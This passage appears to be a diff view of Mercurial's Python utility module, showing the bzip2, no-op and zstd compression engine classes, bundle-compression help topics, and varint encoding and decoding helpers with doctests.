3656 3654 # We declare a protocol name but don't advertise by default because
3657 3655 # it is slow.
3658 3656 def wireprotosupport(self):
3659 3657 return compewireprotosupport('bzip2', 0, 0)
3660 3658
3661 3659 def compressstream(self, it, opts=None):
3662 3660 opts = opts or {}
3663 3661 z = bz2.BZ2Compressor(opts.get('level', 9))
3664 3662 for chunk in it:
3665 3663 data = z.compress(chunk)
3666 3664 if data:
3667 3665 yield data
3668 3666
3669 3667 yield z.flush()
3670 3668
3671 3669 def decompressorreader(self, fh):
3672 3670 return _BZ2CompressedStreamReader(fh)
3673 3671
3674 3672 compengines.register(_bz2engine())
3675 3673
3676 3674 class _truncatedbz2engine(compressionengine):
3677 3675 def name(self):
3678 3676 return 'bz2truncated'
3679 3677
3680 3678 def bundletype(self):
3681 3679 return None, '_truncatedBZ'
3682 3680
3683 3681 # We don't implement compressstream because it is hackily handled elsewhere.
3684 3682
3685 3683 def decompressorreader(self, fh):
3686 3684 return _TruncatedBZ2CompressedStreamReader(fh)
3687 3685
3688 3686 compengines.register(_truncatedbz2engine())
3689 3687
3690 3688 class _noopengine(compressionengine):
3691 3689 def name(self):
3692 3690 return 'none'
3693 3691
3694 3692 def bundletype(self):
3695 3693 """No compression is performed.
3696 3694
3697 3695 Use this compression engine to explicitly disable compression.
3698 3696 """
3699 3697 return 'none', 'UN'
3700 3698
3701 3699 # Clients always support uncompressed payloads. Servers don't because
3702 3700 # unless you are on a fast network, uncompressed payloads can easily
3703 3701 # saturate your network pipe.
3704 3702 def wireprotosupport(self):
3705 3703 return compewireprotosupport('none', 0, 10)
3706 3704
3707 3705 # We don't implement revlogheader because it is handled specially
3708 3706 # in the revlog class.
3709 3707
3710 3708 def compressstream(self, it, opts=None):
3711 3709 return it
3712 3710
3713 3711 def decompressorreader(self, fh):
3714 3712 return fh
3715 3713
3716 3714 class nooprevlogcompressor(object):
3717 3715 def compress(self, data):
3718 3716 return None
3719 3717
3720 3718 def revlogcompressor(self, opts=None):
3721 3719 return self.nooprevlogcompressor()
3722 3720
3723 3721 compengines.register(_noopengine())
3724 3722
3725 3723 class _zstdengine(compressionengine):
3726 3724 def name(self):
3727 3725 return 'zstd'
3728 3726
3729 3727 @propertycache
3730 3728 def _module(self):
3731 3729 # Not all installs have the zstd module available. So defer importing
3732 3730 # until first access.
3733 3731 try:
3734 3732 from . import zstd
3735 3733 # Force delayed import.
3736 3734 zstd.__version__
3737 3735 return zstd
3738 3736 except ImportError:
3739 3737 return None
3740 3738
3741 3739 def available(self):
3742 3740 return bool(self._module)
3743 3741
3744 3742 def bundletype(self):
3745 3743 """A modern compression algorithm that is fast and highly flexible.
3746 3744
3747 3745 Only supported by Mercurial 4.1 and newer clients.
3748 3746
3749 3747 With the default settings, zstd compression is both faster and yields
3750 3748 better compression than ``gzip``. It also frequently yields better
3751 3749 compression than ``bzip2`` while operating at much higher speeds.
3752 3750
3753 3751 If this engine is available and backwards compatibility is not a
3754 3752 concern, it is likely the best available engine.
3755 3753 """
3756 3754 return 'zstd', 'ZS'
3757 3755
3758 3756 def wireprotosupport(self):
3759 3757 return compewireprotosupport('zstd', 50, 50)
3760 3758
3761 3759 def revlogheader(self):
3762 3760 return '\x28'
3763 3761
3764 3762 def compressstream(self, it, opts=None):
3765 3763 opts = opts or {}
3766 3764 # zstd level 3 is almost always significantly faster than zlib
3767 3765 # while providing no worse compression. It strikes a good balance
3768 3766 # between speed and compression.
3769 3767 level = opts.get('level', 3)
3770 3768
3771 3769 zstd = self._module
3772 3770 z = zstd.ZstdCompressor(level=level).compressobj()
3773 3771 for chunk in it:
3774 3772 data = z.compress(chunk)
3775 3773 if data:
3776 3774 yield data
3777 3775
3778 3776 yield z.flush()
3779 3777
3780 3778 def decompressorreader(self, fh):
3781 3779 return _ZstdCompressedStreamReader(fh, self._module)
3782 3780
3783 3781 class zstdrevlogcompressor(object):
3784 3782 def __init__(self, zstd, level=3):
3785 3783 # TODO consider omitting frame magic to save 4 bytes.
3786 3784 # This writes content sizes into the frame header. That is
3787 3785 # extra storage. But it allows a correct size memory allocation
3788 3786 # to hold the result.
3789 3787 self._cctx = zstd.ZstdCompressor(level=level)
3790 3788 self._dctx = zstd.ZstdDecompressor()
3791 3789 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3792 3790 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3793 3791
3794 3792 def compress(self, data):
3795 3793 insize = len(data)
3796 3794 # Caller handles empty input case.
3797 3795 assert insize > 0
3798 3796
3799 3797 if insize < 50:
3800 3798 return None
3801 3799
3802 3800 elif insize <= 1000000:
3803 3801 compressed = self._cctx.compress(data)
3804 3802 if len(compressed) < insize:
3805 3803 return compressed
3806 3804 return None
3807 3805 else:
3808 3806 z = self._cctx.compressobj()
3809 3807 chunks = []
3810 3808 pos = 0
3811 3809 while pos < insize:
3812 3810 pos2 = pos + self._compinsize
3813 3811 chunk = z.compress(data[pos:pos2])
3814 3812 if chunk:
3815 3813 chunks.append(chunk)
3816 3814 pos = pos2
3817 3815 chunks.append(z.flush())
3818 3816
3819 3817 if sum(map(len, chunks)) < insize:
3820 3818 return ''.join(chunks)
3821 3819 return None
3822 3820
3823 3821 def decompress(self, data):
3824 3822 insize = len(data)
3825 3823
3826 3824 try:
3827 3825 # This was measured to be faster than other streaming
3828 3826 # decompressors.
3829 3827 dobj = self._dctx.decompressobj()
3830 3828 chunks = []
3831 3829 pos = 0
3832 3830 while pos < insize:
3833 3831 pos2 = pos + self._decompinsize
3834 3832 chunk = dobj.decompress(data[pos:pos2])
3835 3833 if chunk:
3836 3834 chunks.append(chunk)
3837 3835 pos = pos2
3838 3836 # Frame should be exhausted, so no finish() API.
3839 3837
3840 3838 return ''.join(chunks)
3841 3839 except Exception as e:
3842 3840 raise error.StorageError(_('revlog decompress error: %s') %
3843 3841 stringutil.forcebytestr(e))
3844 3842
3845 3843 def revlogcompressor(self, opts=None):
3846 3844 opts = opts or {}
3847 3845 return self.zstdrevlogcompressor(self._module,
3848 3846 level=opts.get('level', 3))
3849 3847
3850 3848 compengines.register(_zstdengine())
3851 3849
3852 3850 def bundlecompressiontopics():
3853 3851 """Obtains a list of available bundle compressions for use in help."""
3854 3852 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3855 3853 items = {}
3856 3854
3857 3855 # We need to format the docstring. So use a dummy object/type to hold it
3858 3856 # rather than mutating the original.
3859 3857 class docobject(object):
3860 3858 pass
3861 3859
3862 3860 for name in compengines:
3863 3861 engine = compengines[name]
3864 3862
3865 3863 if not engine.available():
3866 3864 continue
3867 3865
3868 3866 bt = engine.bundletype()
3869 3867 if not bt or not bt[0]:
3870 3868 continue
3871 3869
3872 3870 doc = pycompat.sysstr('``%s``\n %s') % (
3873 3871 bt[0], engine.bundletype.__doc__)
3874 3872
3875 3873 value = docobject()
3876 3874 value.__doc__ = doc
3877 3875 value._origdoc = engine.bundletype.__doc__
3878 3876 value._origfunc = engine.bundletype
3879 3877
3880 3878 items[bt[0]] = value
3881 3879
3882 3880 return items
3883 3881
3884 3882 i18nfunctions = bundlecompressiontopics().values()
3885 3883
3886 3884 # convenient shortcut
3887 3885 dst = debugstacktrace
3888 3886
3889 3887 def safename(f, tag, ctx, others=None):
3890 3888 """
3891 3889 Generate a name that it is safe to rename f to in the given context.
3892 3890
3893 3891 f: filename to rename
3894 3892 tag: a string tag that will be included in the new name
3895 3893 ctx: a context, in which the new name must not exist
3896 3894 others: a set of other filenames that the new name must not be in
3897 3895
3898 3896 Returns a file name of the form oldname~tag[~number] which does not exist
3899 3897 in the provided context and is not in the set of other names.
3900 3898 """
3901 3899 if others is None:
3902 3900 others = set()
3903 3901
3904 3902 fn = '%s~%s' % (f, tag)
3905 3903 if fn not in ctx and fn not in others:
3906 3904 return fn
3907 3905 for n in itertools.count(1):
3908 3906 fn = '%s~%s~%s' % (f, tag, n)
3909 3907 if fn not in ctx and fn not in others:
3910 3908 return fn
3911 3909
3912 3910 def readexactly(stream, n):
3913 3911 '''read n bytes from stream.read and abort if less was available'''
3914 3912 s = stream.read(n)
3915 3913 if len(s) < n:
3916 3914 raise error.Abort(_("stream ended unexpectedly"
3917 3915 " (got %d bytes, expected %d)")
3918 3916 % (len(s), n))
3919 3917 return s
3920 3918
3921 3919 def uvarintencode(value):
3922 3920 """Encode an unsigned integer value to a varint.
3923 3921
3924 3922 A varint is a variable length integer of 1 or more bytes. Each byte
3925 3923 except the last has the most significant bit set. The lower 7 bits of
3926 3924 each byte store the 2's complement representation, least significant group
3927 3925 first.
3928 3926
3929 3927 >>> uvarintencode(0)
3930 3928 '\\x00'
3931 3929 >>> uvarintencode(1)
3932 3930 '\\x01'
3933 3931 >>> uvarintencode(127)
3934 3932 '\\x7f'
3935 3933 >>> uvarintencode(1337)
3936 3934 '\\xb9\\n'
3937 3935 >>> uvarintencode(65536)
3938 3936 '\\x80\\x80\\x04'
3939 3937 >>> uvarintencode(-1)
3940 3938 Traceback (most recent call last):
3941 3939 ...
3942 3940 ProgrammingError: negative value for uvarint: -1
3943 3941 """
3944 3942 if value < 0:
3945 3943 raise error.ProgrammingError('negative value for uvarint: %d'
3946 3944 % value)
3947 3945 bits = value & 0x7f
3948 3946 value >>= 7
3949 3947 bytes = []
3950 3948 while value:
3951 3949 bytes.append(pycompat.bytechr(0x80 | bits))
3952 3950 bits = value & 0x7f
3953 3951 value >>= 7
3954 3952 bytes.append(pycompat.bytechr(bits))
3955 3953
3956 3954 return ''.join(bytes)
3957 3955
3958 3956 def uvarintdecodestream(fh):
3959 3957 """Decode an unsigned variable length integer from a stream.
3960 3958
3961 3959 The passed argument is anything that has a ``.read(N)`` method.
3962 3960
3963 3961 >>> try:
3964 3962 ... from StringIO import StringIO as BytesIO
3965 3963 ... except ImportError:
3966 3964 ... from io import BytesIO
3967 3965 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3968 3966 0
3969 3967 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3970 3968 1
3971 3969 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3972 3970 127
3973 3971 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3974 3972 1337
3975 3973 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3976 3974 65536
3977 3975 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3978 3976 Traceback (most recent call last):
3979 3977 ...
3980 3978 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3981 3979 """
3982 3980 result = 0
3983 3981 shift = 0
3984 3982 while True:
3985 3983 byte = ord(readexactly(fh, 1))
3986 3984 result |= ((byte & 0x7f) << shift)
3987 3985 if not (byte & 0x80):
3988 3986 return result
3989 3987 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now